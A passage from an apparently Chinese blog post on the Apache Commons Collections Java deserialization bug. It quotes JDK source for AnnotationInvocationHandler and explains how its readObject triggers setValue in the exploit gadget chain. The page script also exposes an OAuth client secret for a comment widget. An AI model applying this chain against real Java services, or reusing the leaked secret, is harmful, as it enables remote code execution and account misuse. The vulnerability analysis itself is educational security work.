<p>正因如此，为了触发反序列化漏洞，必须存在一个类，接收Map对象，并且在反序列化的时候会触发<code>setValue</code>方法。<br><code>sun.reflect.annotation.AnnotationInvocationHandler</code>满足上述需求，并且是JRE原生的类，不需要第三方的支持。由于<code>AnnotationInvocationHandler</code>这个类是包访问权限，所以无法直接访问，需要通过反射调用。</p>
<p>这里就不画图了，代码也比较简单。<br>可以看到刚开始就调用了<code>AnnotationInvocationHandler</code>的构造函数，传入了两个参数，一个是<code>java.lang.annotation.Retention.class</code>，还有我们的<code>outerMap</code>。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">AnnotationInvocationHandler(Class&lt;? extends Annotation&gt; var1, Map&lt;String, Object&gt; var2) &#123;</span><br><span class="line">        Class[] var3 = var1.getInterfaces();</span><br><span class="line">        <span class="keyword">if</span> (var1.isAnnotation() &amp;&amp; var3.length == <span class="number">1</span> &amp;&amp; var3[<span class="number">0</span>] == Annotation.class) &#123;</span><br><span class="line">            <span class="keyword">this</span>.type = var1;</span><br><span class="line">            <span class="keyword">this</span>.memberValues = var2;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> AnnotationFormatError(<span class="string">"Attempt to create proxy for a non-annotation type."</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>构造函数把<code>java.lang.annotation.Retention.class</code>赋值给<code>type</code>属性，把<code>outerMap</code>赋值给<code>mamberValues</code>属性。然后就没有了，我们看看<code>readObject</code>方法。由于反编译的变量名都没有意义，我这里找了一份源码。<strong>注意，只有在jdk小于等于1.7的时候<code>AnnotationInvocationHandler</code>是调用了setValue的！</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream paramObjectInputStream)</span></span></span><br><span class="line"><span class="function">        <span class="keyword">throws</span> IOException, ClassNotFoundException </span>&#123;</span><br><span class="line">    paramObjectInputStream.defaultReadObject();</span><br><span class="line">    AnnotationType localAnnotationType = <span class="keyword">null</span>;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        localAnnotationType = AnnotationType.getInstance(<span class="keyword">this</span>.type);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (IllegalArgumentException localIllegalArgumentException) &#123;</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    Map localMap = localAnnotationType.memberTypes();</span><br><span class="line">    Iterator localIterator = <span class="keyword">this</span>.memberValues.entrySet().iterator();</span><br><span class="line">    <span class="keyword">while</span> (localIterator.hasNext()) &#123;</span><br><span class="line">        Map.Entry localEntry = (Map.Entry) localIterator.next();</span><br><span class="line">        String str = (String) localEntry.getKey();</span><br><span class="line">        Class localClass = (Class) localMap.get(str);</span><br><span class="line">        <span class="keyword">if</span> (localClass != <span class="keyword">null</span>) &#123;</span><br><span class="line">            Object localObject = localEntry.getValue();</span><br><span class="line">            <span class="keyword">if</span> ((!(localClass.isInstance(localObject)))</span><br><span class="line">                    &amp;&amp; (!(localObject <span class="keyword">instanceof</span> ExceptionProxy)))</span><br><span class="line">                localEntry.setValue(<span class="keyword">new</span> AnnotationTypeMismatchExceptionProxy(</span><br><span class="line">                                localObject.getClass() + <span class="string">"["</span> + localObject</span><br><span class="line">                                        + <span class="string">"]"</span>)</span><br><span class="line">                                .setMember((Method) localAnnotationType</span><br><span class="line">                                        .members().get(str)));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在该方法的一开始，就获取了this.type的实例，也就是<code>java.lang.annotation.Retention.class</code>。然后调用该实例的<code>memberTypes()</code>方法，获得一个<code>Map</code>。(var3就是localMap)</p>
<p><img src="/media/15424402254506.jpg" alt=""></p>
<p>下面的行代码就很熟悉了，获取传入的的迭代器，然后<code>hasNext()</code>判断是否有下一个节点，如果有的话就执行<code>next()</code>方法。因为这里就是POC中的<code>outerMap</code>，所以这里为<code>true</code>。在执行<code>next</code>方法后，可以发现在上面0x03的0x04中提到的伏笔，这里的<code>getKey()</code>就是获取了POC3中<code>innerMap</code>所添加键值对的<code>key</code>，值为<code>&quot;value&quot;</code>(有点绕)，赋值给变量<code>str</code>。然后<code>localMap</code>通过<code>get()</code>方法获取<code>key</code>等于<code>&quot;value&quot;</code>的键值对的值，也就是上图框中的<code>value</code>，也就是<code>class java.lang.annotation.RetentionPolicy</code>。然后判断获得的Class是否为空，再获取<code>localEntry</code>的值，也就是字符串<code>&quot;asdf&quot;</code>。判断<code>localObject</code>是否是<code>localClass</code>的实例，很明显不是，并且判断<code>localObject</code>是否是<code>ExceptionProxy</code>的实例，很明显也不是。所以往下执行，<code>setValue()</code>!</p>
<h1 id="0x05-废话"><a href="#0x05-废话" class="headerlink" title="0x05 废话"></a>0x05 废话</h1><p>本文太长，累了，说不动废话了。<br>感觉hexo的图片加载特别慢，需要一个图床了，有空看看有没有什么好办法。</p>
<blockquote>
<p>一支穿云箭 千军万马来相见<br>两副忠义胆 刀山火海提命现</p>
</blockquote>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#Java">
    <span class="tag-code">Java</span>
  </a>

  <a href="/tags#Deserialization">
    <span class="tag-code">Deserialization</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- 打赏 START -->
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    <div class="qrcode">
      <canvas id="share-qrcode"></canvas>
      <p class="notice">扫描二维码，分享此文章</p>
    </div>
    <!-- 二维码 END -->
    
      <!-- Gitment START -->
      <div id="comments"></div>
      <!-- Gitment END -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#0x01-一支穿云箭，千军万马来相见"><span class="toc-nav-text">0x01 一支穿云箭，千军万马来相见</span></a></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#0x02-一切先从POC开始"><span class="toc-nav-text">0x02 一切先从POC开始</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-org-apache-commons-collections-functors-ConstantTransformer"><span class="toc-nav-text">0x01 org.apache.commons.collections.functors.ConstantTransformer</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-org-apache-commons-collections-functors-InvokerTransformer"><span class="toc-nav-text">0x02 org.apache.commons.collections.functors.InvokerTransformer</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x03-org-apache-commons-collections-functors-ChainedTransformer"><span class="toc-nav-text">0x03 org.apache.commons.collections.functors.ChainedTransformer</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x04-为什么这样就能成功执行呢"><span class="toc-nav-text">0x04 为什么这样就能成功执行呢</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#0x03-第二个POC"><span class="toc-nav-text">0x03 第二个POC</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-小二，上POC"><span class="toc-nav-text">0x01 小二，上POC!</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-一些基础资料"><span class="toc-nav-text">0x02 一些基础资料</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x03-分析时的注意事项以及时序图"><span class="toc-nav-text">0x03 分析时的注意事项以及时序图</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x04-伏笔"><span class="toc-nav-text">0x04 伏笔</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#0x04-第三个POC"><span class="toc-nav-text">0x04 第三个POC</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-喝完这一杯，还有一杯"><span class="toc-nav-text">0x01 喝完这一杯，还有一杯</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-sun-reflect-annotation-AnnotationInvocationHandler"><span class="toc-nav-text">0x02 sun.reflect.annotation.AnnotationInvocationHandler</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-1"><a class="toc-nav-link" href="#0x05-废话"><span class="toc-nav-text">0x05 废话</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://whip1ash.github.io/2018/11/11/java-deserialization-2/';
    var banner = 'undefined'
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

     // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()
        
        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })

    // qrcode
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });

    // gitment
    var gitmentConfig = "whip1ash";
    if (gitmentConfig !== 'undefined') {
      var gitment = new Gitment({
        id: "Apache Commons Collections反序列化漏洞分析(上) - 从0开始学习Java反序列化 (3)",
        owner: "whip1ash",
        repo: "whip1ash.github.io",
        oauth: {
          client_id: "ae16d933c78b6cc642c8",
          client_secret: "e9045e51de8f846b89b22e347cd34d1fe345c533"
        },
        theme: {
          render(state, instance) {
            const container = document.createElement('div')
            container.lang = "en-US"
            container.className = 'gitment-container gitment-root-container'
            container.appendChild(instance.renderHeader(state, instance))
            container.appendChild(instance.renderEditor(state, instance))
            container.appendChild(instance.renderComments(state, instance))
            container.appendChild(instance.renderFooter(state, instance))
            return container;
          }
        }
      })
      gitment.render(document.getElementById('comments'))
    }
  })();
</script>

    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2018 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdn.bootcss.com/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine == 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>